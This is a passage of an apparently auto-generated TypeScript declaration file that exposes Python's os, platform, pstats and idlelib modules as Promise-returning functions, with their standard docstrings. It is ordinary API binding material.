Promise<any>\n\t\t\tupdate_font$($: {}): Promise<any>\n\t\t\tupdate_highlight_colors(): Promise<any>\n\t\t\tupdate_highlight_colors$($: {}): Promise<any>\n\t\t\tUPDATEINTERVAL\n\t\t}\n\t\tlet BLOCKOPENERS: Promise<any>\n\t}\n\tmodule statusbar {\n\t\tvar _\n\t\tfunction MultiStatusBar(master): Promise<IMultiStatusBar>\n\t\tfunction MultiStatusBar$({ master }): Promise<IMultiStatusBar>\n\t\tinterface IMultiStatusBar {\n\t\t\tset_label(name, text?, side?, width?): Promise<any>\n\t\t\tset_label$({ name, text, side, width }: { name, text?, side?, width?}): Promise<any>\n\t\t}\n\t}\n}\ndeclare module os {\n\tvar _\n\n\t/**\n\t * makedirs(name [, mode=0o777][, exist_ok=False])\n\t * \n\t * Super-mkdir; create a leaf directory and all intermediate ones. Works like\n\t * mkdir, except that any intermediate path segment (not just the rightmost)\n\t * will be created if it does not exist. If the target directory already\n\t * exists, raise an OSError if exist_ok is False. Otherwise no exception is\n\t * raised. This is recursive.\n\t * \n\t * \n\t */\n\tfunction makedirs(name, mode?, exist_ok?: boolean): Promise<any>\n\tfunction makedirs$({ name, mode, exist_ok }: { name, mode?, exist_ok?}): Promise<any>\n\n\t/**\n\t * removedirs(name)\n\t * \n\t * Super-rmdir; remove a leaf directory and all empty intermediate\n\t * ones. Works like rmdir except that, if the leaf directory is\n\t * successfully removed, directories corresponding to rightmost path\n\t * segments will be pruned away until either the whole path is\n\t * consumed or an error occurs. Errors during this latter phase are\n\t * ignored -- they generally mean that a directory was not empty.\n\t * \n\t * \n\t */\n\tfunction removedirs(name): Promise<any>\n\tfunction removedirs$({ name }): Promise<any>\n\n\t/**\n\t * renames(old, new)\n\t * \n\t * Super-rename; create directories as necessary and delete any left\n\t * empty. Works like rename, except creation of any intermediate\n\t * directories needed to make the new pathname good is attempted\n\t * first. After the rename, directories corresponding to rightmost\n\t * path segments of the old name will be pruned until either the\n\t * whole path is consumed or a nonempty directory is found.\n\t * \n\t * Note: this function can fail with the new directory structure made\n\t * if you lack permissions needed to unlink the leaf directory or\n\t * file.\n\t * \n\t * \n\t */\n\tfunction renames(old, New): Promise<any>\n\tfunction renames$({ old, New }): Promise<any>\n\n\t/**\n\t * Directory tree generator.\n\t * \n\t * For each directory in the directory tree rooted at top (including top\n\t * itself, but excluding '.' and '..'), yields a 3-tuple\n\t * \n\t * dirpath, dirnames, filenames\n\t * \n\t * dirpath is a string, the path to the directory. dirnames is a list of\n\t * the names of the subdirectories in dirpath (excluding '.' and '..').\n\t * filenames is a list of the names of the non-directory files in dirpath.\n\t * Note that the names in the lists are just names, with no path components.\n\t * To get a full path (which begins with top) to a file or directory in\n\t * dirpath, do os.path.join(dirpath, name).\n\t * \n\t * If optional arg 'topdown' is true or not specified, the triple for a\n\t * directory is generated before the triples for any of its subdirectories\n\t * (directories are generated top down). If topdown is false, the triple\n\t * for a directory is generated after the triples for all of its\n\t * subdirectories (directories are generated bottom up).\n\t * \n\t * When topdown is true, the caller can modify the dirnames list in-place\n\t * (e.g., via del or slice assignment), and walk will only recurse into the\n\t * subdirectories whose names remain in dirnames; this can be used to prune the\n\t * search, or to impose a specific order of visiting. Modifying dirnames when\n\t * topdown is false has no effect on the behavior of os.walk(), since the\n\t * directories in dirnames have already been generated by the time dirnames\n\t * itself is generated. No matter the value of topdown, the list of\n\t * subdirectories is retrieved before the tuples for the directory and its\n\t * subdirectories are generated.\n\t * \n\t * By default errors from the os.scandir() call are ignored. If\n\t * optional arg 'onerror' is specified, it should be a function; it\n\t * will be called with one argument, an OSError instance. It can\n\t * report the error to continue with the walk, or raise the exception\n\t * to abort the walk. Note that the filename is available as the\n\t * filename attribute of the exception object.\n\t * \n\t * By default, os.walk does not follow symbolic links to subdirectories on\n\t * systems that support them. In order to get this functionality, set the\n\t * optional argument 'followlinks' to true.\n\t * \n\t * Caution: if you pass a relative pathname for top, don't change the\n\t * current working directory between resumptions of walk. walk never\n\t * changes the current directory, and assumes that the client doesn't\n\t * either.\n\t * \n\t * Example:\n\t * \n\t * import os\n\t * from os.path import join, getsize\n\t * for root, dirs, files in os.walk('python/Lib/email'):\n\t * print(root, \"consumes\", end=\"\")\n\t * print(sum(getsize(join(root, name)) for name in files), end=\"\")\n\t * print(\"bytes in\", len(files), \"non-directory files\")\n\t * if 'CVS' in dirs:\n\t * dirs.remove('CVS') # don't visit CVS directories\n\t * \n\t * \n\t */\n\tfunction walk(top, topdown?: boolean, onerror?, followlinks?: boolean): Promise<any>\n\tfunction walk$({ top, topdown, onerror, followlinks }: { top, topdown?, onerror?, followlinks?}): Promise<any>\n\n\t/**\n\t * Directory tree generator.\n\t * \n\t * This behaves exactly like walk(), except that it yields a 4-tuple\n\t * \n\t * dirpath, dirnames, filenames, dirfd\n\t * \n\t * `dirpath`, `dirnames` and `filenames` are identical to walk() output,\n\t * and `dirfd` is a file descriptor referring to the directory `dirpath`.\n\t * \n\t * The advantage of fwalk() over walk() is that it's safe against symlink\n\t * races (when follow_symlinks is False).\n\t * \n\t * If dir_fd is not None, it should be a file descriptor open to a directory,\n\t * and top should be relative; top will then be relative to that directory.\n\t * (dir_fd is always supported for fwalk.)\n\t * \n\t * Caution:\n\t * Since fwalk() yields file descriptors, those are only valid until the\n\t * next iteration step, so you should dup() them if you want to keep them\n\t * for a longer period.\n\t * \n\t * Example:\n\t * \n\t * import os\n\t * for root, dirs, files, rootfd in os.fwalk('python/Lib/email'):\n\t * print(root, \"consumes\", end=\"\")\n\t * print(sum(os.stat(name, dir_fd=rootfd).st_size for name in files),\n\t * end=\"\")\n\t * print(\"bytes in\", len(files), \"non-directory files\")\n\t * if 'CVS' in dirs:\n\t * dirs.remove('CVS') # don't visit CVS directories\n\t * \n\t */\n\tfunction fwalk(top?, topdown?: boolean, onerror?): Promise<any>\n\tfunction fwalk$({ top, topdown, onerror }: { top?, topdown?, onerror?}): Promise<any>\n\n\t/**\n\t * execl(file, *args)\n\t * \n\t * Execute the executable file with argument list args, replacing the\n\t * current process. \n\t */\n\tfunction execl(file): Promise<any>\n\tfunction execl$({ file }): Promise<any>\n\n\t/**\n\t * execle(file, *args, env)\n\t * \n\t * Execute the executable file with argument list args and\n\t * environment env, replacing the current process. \n\t */\n\tfunction execle(file): Promise<any>\n\tfunction execle$({ file }): Promise<any>\n\n\t/**\n\t * execlp(file, *args)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args, replacing the current process. \n\t */\n\tfunction execlp(file): Promise<any>\n\tfunction execlp$({ file }): Promise<any>\n\n\t/**\n\t * execlpe(file, *args, env)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args and environment env, replacing the current\n\t * process. \n\t */\n\tfunction execlpe(file): Promise<any>\n\tfunction execlpe$({ file }): Promise<any>\n\n\t/**\n\t * execvp(file, args)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args, replacing the current process.\n\t * args may be a list or tuple of strings. \n\t */\n\tfunction execvp(file, args): Promise<any>\n\tfunction execvp$({ file, args }): Promise<any>\n\n\t/**\n\t * execvpe(file, args, env)\n\t * \n\t * Execute the executable file (which is searched for along $PATH)\n\t * with argument list args and environment env, replacing the\n\t * current process.\n\t * args may be a list or tuple of strings. \n\t */\n\tfunction execvpe(file, args, env): Promise<any>\n\tfunction execvpe$({ file, args, env }): Promise<any>\n\n\t/**\n\t * Returns the sequence of directories that will be searched for the\n\t * named executable (similar to a shell) when launching a process.\n\t * \n\t * *env* must be an environment variable dict or None. If *env* is None,\n\t * os.environ will be used.\n\t * \n\t */\n\tfunction get_exec_path(env?): Promise<any>\n\tfunction get_exec_path$({ env }: { env?}): Promise<any>\n\n\t/**\n\t * Get an environment variable, return None if it doesn't exist.\n\t * The optional second argument can specify an alternate default.\n\t * key, default and the result are str.\n\t */\n\tfunction getenv(key, def?): Promise<any>\n\tfunction getenv$({ key, def }: { key, def?}): Promise<any>\n\n\t/**\n\t * Get an environment variable, return None if it doesn't exist.\n\t * The optional second argument can specify an alternate default.\n\t * key, default and the result are bytes.\n\t */\n\tfunction getenvb(key, def?): Promise<any>\n\tfunction getenvb$({ key, def }: { key, def?}): Promise<any>\n\n\t/**\n\t * spawnv(mode, file, args) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnv(mode, file, args): Promise<any>\n\tfunction spawnv$({ mode, file, args }): Promise<any>\n\n\t/**\n\t * spawnve(mode, file, args, env) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess with the\n\t * specified environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnve(mode, file, args, env): Promise<any>\n\tfunction spawnve$({ mode, file, args, env }): Promise<any>\n\n\t/**\n\t * spawnvp(mode, file, args) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnvp(mode, file, args): Promise<any>\n\tfunction spawnvp$({ mode, file, args }): Promise<any>\n\n\t/**\n\t * spawnvpe(mode, file, args, env) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnvpe(mode, file, args, env): Promise<any>\n\tfunction spawnvpe$({ mode, file, args, env }): Promise<any>\n\n\t/**\n\t * spawnl(mode, file, *args) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnl(mode, file): Promise<any>\n\tfunction spawnl$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnle(mode, file, *args, env) -> integer\n\t * \n\t * Execute file with arguments from args in a subprocess with the\n\t * supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnle(mode, file): Promise<any>\n\tfunction spawnle$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnlp(mode, file, *args) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnlp(mode, file): Promise<any>\n\tfunction spawnlp$({ mode, file }): Promise<any>\n\n\t/**\n\t * spawnlpe(mode, file, *args, env) -> integer\n\t * \n\t * Execute file (which is looked for along $PATH) with arguments from\n\t * args in a subprocess with the supplied environment.\n\t * If mode == P_NOWAIT return the pid of the process.\n\t * If mode == P_WAIT return the process's exit code if it exits normally;\n\t * otherwise return -SIG, where SIG is the signal that killed it. \n\t */\n\tfunction spawnlpe(mode, file): Promise<any>\n\tfunction spawnlpe$({ mode, file }): Promise<any>\n\tfunction popen(cmd, mode?, buffering?): Promise<any>\n\tfunction popen$({ cmd, mode, buffering }: { cmd, mode?, buffering?}): Promise<any>\n\tfunction fdopen(fd, mode?, buffering?, encoding?): Promise<any>\n\tfunction fdopen$({ fd, mode, buffering, encoding }: { fd, mode?, buffering?, encoding?}): Promise<any>\n\n\t/**\n\t * Add a path to the DLL search path.\n\t * \n\t * This search path is used when resolving dependencies for imported\n\t * extension modules (the module itself is resolved through sys.path),\n\t * and also by ctypes.\n\t * \n\t * Remove the directory by calling close() on the returned object or\n\t * using it in a with statement.\n\t * \n\t */\n\tfunction add_dll_directory(path): Promise<any>\n\tfunction add_dll_directory$({ path }): Promise<any>\n\tinterface I_Environ {\n\t\tcopy(): Promise<any>\n\t\tcopy$($: {}): Promise<any>\n\t\tsetdefault(key, value): Promise<any>\n\t\tsetdefault$({ key, value }): Promise<any>\n\t}\n\tinterface I_wrap_close {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Abstract base class for implementing the file system path protocol.\n\t */\n\tinterface IPathLike {\n\t}\n\tinterface I_AddedDllDirectory {\n\t\tclose(): Promise<any>\n\t\tclose$($: {}): Promise<any>\n\t}\n\tlet GenericAlias: Promise<any>\n\tlet name: Promise<any>\n\tlet linesep: Promise<any>\n\tlet supports_dir_fd: Promise<any>\n\tlet supports_effective_ids: Promise<any>\n\tlet supports_fd: Promise<any>\n\tlet supports_follow_symlinks: Promise<any>\n\tlet SEEK_SET: Promise<any>\n\tlet SEEK_CUR: Promise<any>\n\tlet SEEK_END: Promise<any>\n\tlet environ: Promise<any>\n\tlet supports_bytes_environ: Promise<any>\n\tlet environb: Promise<any>\n\tlet P_WAIT: Promise<any>\n\tlet P_NOWAIT: Promise<any>\n\tlet P_NOWAITO: Promise<any>\n\tlet fspath: Promise<any>\n}\ndeclare module platform {\n\tvar _\n\n\t/**\n\t * Tries to determine the libc version that the file executable\n\t * (which defaults to the Python interpreter) is linked against.\n\t * \n\t * Returns a tuple of strings (lib,version) which default to the\n\t * given parameters in case the lookup fails.\n\t * \n\t * Note that the function has intimate knowledge of how different\n\t * libc versions add symbols to the executable and thus is probably\n\t * only usable for executables compiled using gcc.\n\t * \n\t * The file is read and scanned in chunks of chunksize bytes.\n\t * \n\t * \n\t */\n\tfunction libc_ver(executable?, lib?, version?, chunksize?): Promise<any>\n\tfunction libc_ver$({ executable, lib, version, chunksize }: { executable?, lib?, version?, chunksize?}): Promise<any>\n\tfunction win32_is_iot(): Promise<any>\n\tfunction win32_is_iot$($: {}): Promise<any>\n\tfunction win32_edition(): Promise<any>\n\tfunction win32_edition$($: {}): Promise<any>\n\tfunction win32_ver(release?, version?, csd?, ptype?): Promise<any>\n\tfunction win32_ver$({ release, version, csd, ptype }: { release?, version?, csd?, ptype?}): Promise<any>\n\n\t/**\n\t * Get macOS version information and return it as tuple (release,\n\t * versioninfo, machine) with versioninfo being a tuple (version,\n\t * dev_stage, non_release_version).\n\t * \n\t * Entries which cannot be determined are set to the parameter values\n\t * which default to ''. All tuple entries are strings.\n\t * \n\t */\n\tfunction mac_ver(release?, versioninfo?, machine?): Promise<any>\n\tfunction mac_ver$({ release, versioninfo, machine }: { release?, versioninfo?, machine?}): Promise<any>\n\n\t/**\n\t * Version interface for Jython.\n\t * \n\t * Returns a tuple (release, vendor, vminfo, osinfo) with vminfo being\n\t * a tuple (vm_name, vm_release, vm_vendor) and osinfo being a\n\t * tuple (os_name, os_version, os_arch).\n\t * \n\t * Values which cannot be determined are set to the defaults\n\t * given as parameters (which all default to '').\n\t * \n\t * \n\t */\n\tfunction java_ver(release?, vendor?, vminfo?, osinfo?): Promise<any>\n\tfunction java_ver$({ release, vendor, vminfo, osinfo }: { release?, vendor?, vminfo?, osinfo?}): Promise<any>\n\n\t/**\n\t * Returns (system, release, version) aliased to common\n\t * marketing names used for some systems.\n\t * \n\t * It also does some reordering of the information in some cases\n\t * where it would otherwise cause confusion.\n\t * \n\t * \n\t */\n\tfunction system_alias(system, release, version): Promise<any>\n\tfunction system_alias$({ system, release, version }): Promise<any>\n\n\t/**\n\t * Queries the given executable (defaults to the Python interpreter\n\t * binary) for various architecture information.\n\t * \n\t * Returns a tuple (bits, linkage) which contains information about\n\t * the bit architecture and the linkage format used for the\n\t * executable. Both values are returned as strings.\n\t * \n\t * Values that cannot be determined are returned as given by the\n\t * parameter presets. If bits is given as '', the sizeof(pointer)\n\t * (or sizeof(long) on Python version < 1.5.2) is used as\n\t * indicator for the supported pointer size.\n\t * \n\t * The function relies on the system's \"file\" command to do the\n\t * actual work. This is available on most if not all Unix\n\t * platforms. On some non-Unix platforms where the \"file\" command\n\t * does not exist and the executable is set to the Python interpreter\n\t * binary defaults from _default_architecture are used.\n\t * \n\t * \n\t */\n\tfunction architecture(executable?, bits?, linkage?): Promise<any>\n\tfunction architecture$({ executable, bits, linkage }: { executable?, bits?, linkage?}): Promise<any>\n\n\t/**\n\t * Fairly portable uname interface. Returns a tuple\n\t * of strings (system, node, release, version, machine, processor)\n\t * identifying the underlying platform.\n\t * \n\t * Note that unlike the os.uname function this also returns\n\t * possible processor information as an additional tuple entry.\n\t * \n\t * Entries which cannot be determined are set to ''.\n\t * \n\t * \n\t */\n\tfunction uname(): Promise<any>\n\tfunction uname$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction system(): Promise<any>\n\tfunction system$($: {}): Promise<any>\n\n\t/**\n\t * Returns the computer's network name (which may not be fully\n\t * qualified)\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction node(): Promise<any>\n\tfunction node$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system's release, e.g. '2.2.0' or 'NT'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction release(): Promise<any>\n\tfunction release$($: {}): Promise<any>\n\n\t/**\n\t * Returns the system's release version, e.g. '#3 on degas'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction version(): Promise<any>\n\tfunction version$($: {}): Promise<any>\n\n\t/**\n\t * Returns the machine type, e.g. 'i386'\n\t * \n\t * An empty string is returned if the value cannot be determined.\n\t * \n\t * \n\t */\n\tfunction machine(): Promise<any>\n\tfunction machine$($: {}): Promise<any>\n\n\t/**\n\t * Returns the (true) processor name, e.g. 'amdk6'\n\t * \n\t * An empty string is returned if the value cannot be\n\t * determined. Note that many platforms do not provide this\n\t * information or simply return the same value as for machine(),\n\t * e.g. NetBSD does this.\n\t * \n\t * \n\t */\n\tfunction processor(): Promise<any>\n\tfunction processor$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation.\n\t * \n\t * Currently, the following implementations are identified:\n\t * 'CPython' (C implementation of Python),\n\t * 'IronPython' (.NET implementation of Python),\n\t * 'Jython' (Java implementation of Python),\n\t * 'PyPy' (Python implementation of Python).\n\t * \n\t * \n\t */\n\tfunction python_implementation(): Promise<any>\n\tfunction python_implementation$($: {}): Promise<any>\n\n\t/**\n\t * Returns the Python version as string 'major.minor.patchlevel'\n\t * \n\t * Note that unlike the Python sys.version, the returned value\n\t * will always include the patchlevel (it defaults to 0).\n\t * \n\t * \n\t */\n\tfunction python_version(): Promise<any>\n\tfunction python_version$($: {}): Promise<any>\n\n\t/**\n\t * Returns the Python version as tuple (major, minor, patchlevel)\n\t * of strings.\n\t * \n\t * Note that unlike the Python sys.version, the returned value\n\t * will always include the patchlevel (it defaults to 0).\n\t * \n\t * \n\t */\n\tfunction python_version_tuple(): Promise<any>\n\tfunction python_version_tuple$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation\n\t * branch.\n\t * \n\t * For CPython this is the SCM branch from which the\n\t * Python binary was built.\n\t * \n\t * If not available, an empty string is returned.\n\t * \n\t * \n\t */\n\tfunction python_branch(): Promise<any>\n\tfunction python_branch$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the Python implementation\n\t * revision.\n\t * \n\t * For CPython this is the SCM revision from which the\n\t * Python binary was built.\n\t * \n\t * If not available, an empty string is returned.\n\t * \n\t * \n\t */\n\tfunction python_revision(): Promise<any>\n\tfunction python_revision$($: {}): Promise<any>\n\n\t/**\n\t * Returns a tuple (buildno, builddate) stating the Python\n\t * build number and date as strings.\n\t * \n\t * \n\t */\n\tfunction python_build(): Promise<any>\n\tfunction python_build$($: {}): Promise<any>\n\n\t/**\n\t * Returns a string identifying the compiler used for compiling\n\t * Python.\n\t * \n\t * \n\t */\n\tfunction python_compiler(): Promise<any>\n\tfunction python_compiler$($: {}): Promise<any>\n\n\t/**\n\t * Returns a single string identifying the underlying platform\n\t * with as much useful information as possible (but no more :).\n\t * \n\t * The output is intended to be human readable rather than\n\t * machine parseable. It may look different on different\n\t * platforms and this is intended.\n\t * \n\t * If \"aliased\" is true, the function will use aliases for\n\t * various platforms that report system names which differ from\n\t * their common names, e.g. SunOS will be reported as\n\t * Solaris. The system_alias() function is used to implement\n\t * this.\n\t * \n\t * Setting terse to true causes the function to return only the\n\t * absolute minimum information needed to identify the platform.\n\t * \n\t * \n\t */\n\tfunction platform(aliased?, terse?): Promise<any>\n\tfunction platform$({ aliased, terse }: { aliased?, terse?}): Promise<any>\n\n\t/**\n\t * Return operation system identification from freedesktop.org os-release\n\t * \n\t */\n\tfunction freedesktop_os_release(): Promise<any>\n\tfunction freedesktop_os_release$($: {}): Promise<any>\n\tinterface I_Processor {\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t\tget_win32(): Promise<any>\n\t\tget_win32$($: {}): Promise<any>\n\t\tget_OpenVMS(): Promise<any>\n\t\tget_OpenVMS$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Fall back to `uname -p`\n\t\t * \n\t\t */\n\t\tfrom_subprocess(): Promise<any>\n\t\tfrom_subprocess$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * A uname_result that's largely compatible with a\n\t * simple namedtuple except that 'processor' is\n\t * resolved late and cached to avoid calling \"uname\"\n\t * except when needed.\n\t * \n\t */\n\tinterface Iuname_result {\n\t\tprocessor(): Promise<any>\n\t\tprocessor$($: {}): Promise<any>\n\t}\n\tlet terse: Promise<any>\n\tlet aliased: Promise<any>\n}\ndeclare module pstats {\n\tvar _\n\tfunction func_strip_path(func_name): Promise<any>\n\tfunction func_strip_path$({ func_name }): Promise<any>\n\tfunction func_get_function_name(func): Promise<any>\n\tfunction func_get_function_name$({ func }): Promise<any>\n\tfunction func_std_string(func_name): Promise<any>\n\tfunction func_std_string$({ func_name }): Promise<any>\n\n\t/**\n\t * Add together all the stats for two profile entries.\n\t */\n\tfunction add_func_stats(target, source): Promise<any>\n\tfunction add_func_stats$({ target, source }): Promise<any>\n\n\t/**\n\t * Combine two caller lists in a single list.\n\t */\n\tfunction add_callers(target, source): Promise<any>\n\tfunction add_callers$({ target, source }): Promise<any>\n\n\t/**\n\t * Sum the caller statistics to get total number of calls received.\n\t */\n\tfunction count_calls(callers): Promise<any>\n\tfunction count_calls$({ callers }): Promise<any>\n\tfunction f8(x): Promise<any>\n\tfunction f8$({ x }): Promise<any>\n\tinterface ISortKey {\n\t\tCALLS\n\t\tCUMULATIVE\n\t\tFILENAME\n\t\tLINE\n\t\tNAME\n\t\tNFL\n\t\tPCALLS\n\t\tSTDNAME\n\t\tTIME\n\t}\n\tinterface IFunctionProfile {\n\t}\n\n\t/**\n\t * Class for keeping track of an item in inventory.\n\t */\n\tinterface IStatsProfile {\n\t}\n\n\t/**\n\t * This class is used for creating reports from data generated by the\n\t * Profile class. It is a \"friend\" of that class, and imports data either\n\t * by direct access to members of Profile class, or by reading in a dictionary\n\t * that was emitted (via marshal) from the Profile class.\n\t * \n\t * The big change from the previous Profiler (in terms of raw functionality)\n\t * is that an \"add()\" method has been provided to combine Stats from\n\t * several distinct profile runs. Both the constructor and the add()\n\t * method now take arbitrarily many file names as arguments.\n\t * \n\t * All the print methods now take an argument that indicates how many lines\n\t * to print. If the arg is a floating point number between 0 and 1.0, then\n\t * it is taken as a decimal percentage of the available lines to be printed\n\t * (e.g., .1 means print 10% of all available lines). If it is an integer,\n\t * it is taken to mean the number of lines of data that you wish to have\n\t * printed.\n\t * \n\t * The sort_stats() method now processes some additional options (i.e., in\n\t * addition to the old -1, 0, 1, or 2 that are respectively interpreted as\n\t * 'stdname', 'calls', 'time', and 'cumulative'). It takes either an\n\t * arbitrary number of quoted strings or SortKey enum to select the sort\n\t * order.\n\t * \n\t * For example sort_stats('time', 'name') or sort_stats(SortKey.TIME,\n\t * SortKey.NAME) sorts on the major key of 'internal function time', and on\n\t * the minor key of 'the name of the function'. Look at the two tables in\n\t * sort_stats() and get_sort_arg_defs(self) for more examples.\n\t * \n\t * All methods return self, so you can string together commands like:\n\t * Stats('foo', 'goo').strip_dirs().sort_stats('calls'). print_stats(5).print_callers(5)\n\t * \n\t */\n\tfunction Stats(): Promise<IStats>\n\tfunction Stats$({ }): Promise<IStats>\n\tinterface IStats {\n\t\tinit(arg): Promise<any>\n\t\tinit$({ arg }): Promise<any>\n\t\tload_stats(arg): Promise<any>\n\t\tload_stats$({ arg }): Promise<any>\n\t\tget_top_level_stats(): Promise<any>\n\t\tget_top_level_stats$($: {}): Promise<any>\n\t\tadd(): Promise<any>\n\t\tadd$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Write the profile data to a file we know how to load back.\n\t\t */\n\t\tdump_stats(filename): Promise<any>\n\t\tdump_stats$({ filename }): Promise<any>\n\n\t\t/**\n\t\t * Expand all abbreviations that are unique.\n\t\t */\n\t\tget_sort_arg_defs(): Promise<any>\n\t\tget_sort_arg_defs$($: {}): Promise<any>\n\t\tsort_stats(): Promise<any>\n\t\tsort_stats$($: {}): Promise<any>\n\t\treverse_order(): Promise<any>\n\t\treverse_order$($: {}): Promise<any>\n\t\tstrip_dirs(): Promise<any>\n\t\tstrip_dirs$($: {}): Promise<any>\n\t\tcalc_callees(): Promise<any>\n\t\tcalc_callees$($: {}): Promise<any>\n\t\teval_print_amount(sel, list, msg): Promise<any>\n\t\teval_print_amount$({ sel, list, msg }): Promise<any>\n\n\t\t/**\n\t\t * This method returns an instance of StatsProfile, which contains a mapping\n\t\t * of function names to instances of FunctionProfile. Each FunctionProfile\n\t\t * instance holds information related to the function's profile such as how\n\t\t * long the function took to run, how many times it was called, etc...\n\t\t * \n\t\t */\n\t\tget_stats_profile(): Promise<any>\n\t\tget_stats_profile$($: {}): Promise<any>\n\t\tget_print_list(sel_list): Promise<any>\n\t\tget_print_list$({ sel_list }): Promise<any>\n\t\tprint_stats(): Promise<any>\n\t\tprint_stats$($: {}): Promise<any>\n\t\tprint_callees(): Promise<any>\n\t\tprint_callees$($: {}): Promise<any>\n\t\tprint_callers(): Promise<any>\n\t\tprint_callers$($: {}): Promise<any>\n\t\tprint_call_heading(name_size, column_title): Promise<any>\n\t\tprint_call_heading$({ name_size, column_title }): Promise<any>\n\t\tprint_call_line(name_size, source, call_dict, arrow?): Promise<any>\n\t\tprint_call_line$({ name_size, source, call_dict, arrow }: { name_size, source, call_dict, arrow?}): Promise<any>\n\t\tprint_title(): Promise<any>\n\t\tprint_title$($: {}): Promise<any>\n\t\tprint_line(func): Promise<any>\n\t\tprint_line$({ func }): Promise<any>\n\t\tsort_arg_dict_default\n\t}\n\n\t/**\n\t * This class provides a generic function for comparing any two tuples.\n\t * Each instance records a list of tuple-indices (from most significant\n\t * to least significant), and sort direction (ascending or descending) for\n\t * each tuple-index. The compare functions can then be used as the function\n\t * argument to the system sort() function when a list of tuples need to be\n\t * sorted in the instances order.\n\t */\n\tfunction TupleComp(comp_select_list): Promise<ITupleComp>\n\tfunction TupleComp$({ comp_select_list }): Promise<ITupleComp>\n\tinterface ITupleComp {\n\t\tcompare(left, right): Promise<any>\n\t\tcompare$({ left, right }): Promise<any>\n\t}\n\tfunction ProfileBrowser(profile?): Promise<IProfileBrowser>\n\tfunction ProfileBrowser$({ profile }: { profile?}): Promise<IProfileBrowser>\n\tinterface IProfileBrowser {\n\t\tgeneric(fn, line): Promise<any>\n\t\tgeneric$({ fn, line }): Promise<any>\n\t\tgeneric_help(): Promise<any>\n\t\tgeneric_help$($: {}): Promise<any>\n\t\tdo_add(line): Promise<any>\n\t\tdo_add$({ line }): Promise<any>\n\t\thelp_add(): Promise<any>\n\t\thelp_add$($: {}): Promise<any>\n\t\tdo_callees(line): Promise<any>\n\t\tdo_callees$({ line }): Promise<any>\n\t\thelp_callees(): Promise<any>\n\t\thelp_callees$($: {}): Promise<any>\n\t\tdo_callers(line): Promise<any>\n\t\tdo_callers$({ line }): Promise<any>\n\t\thelp_callers(): Promise<any>\n\t\thelp_callers$($: {}): Promise<any>\n\t\tdo_EOF(line): Promise<any>\n\t\tdo_EOF$({ line }): Promise<any>\n\t\thelp_EOF(): Promise<any>\n\t\thelp_EOF$($: {}): Promise<any>\n\t\tdo_quit(line): Promise<any>\n\t\tdo_quit$({ line }): Promise<any>\n\t\thelp_quit(): Promise<any>\n\t\thelp_quit$($: {}): Promise<any>\n\t\tdo_read(line): Promise<any>\n\t\tdo_read$({ line }): Promise<any>\n\t\thelp_read(): Promise<any>\n\t\thelp_read$($: {}): Promise<any>\n\t\tdo_reverse(line): Promise<any>\n\t\tdo_reverse$({ line }): Promise<any>\n\t\thelp_reverse(): Promise<any>\n\t\thelp_reverse$($: {}): Promise<any>\n\t\tdo_sort(line): Promise<any>\n\t\tdo_sort$({ line }): Promise<any>\n\t\thelp_sort(): Promise<any>\n\t\thelp_sort$($: {}): Promise<any>\n\t\tcomplete_sort(text): Promise<any>\n\t\tcomplete_sort$({ text }): Promise<any>\n\t\tdo_stats(line): Promise<any>\n\t\tdo_stats$({ line }): Promise<any>\n\t\thelp_stats(): Promise<any>\n\t\thelp_stats$($: {}): Promise<any>\n\t\tdo_strip(line): Promise<any>\n\t\tdo_strip$({ line }): 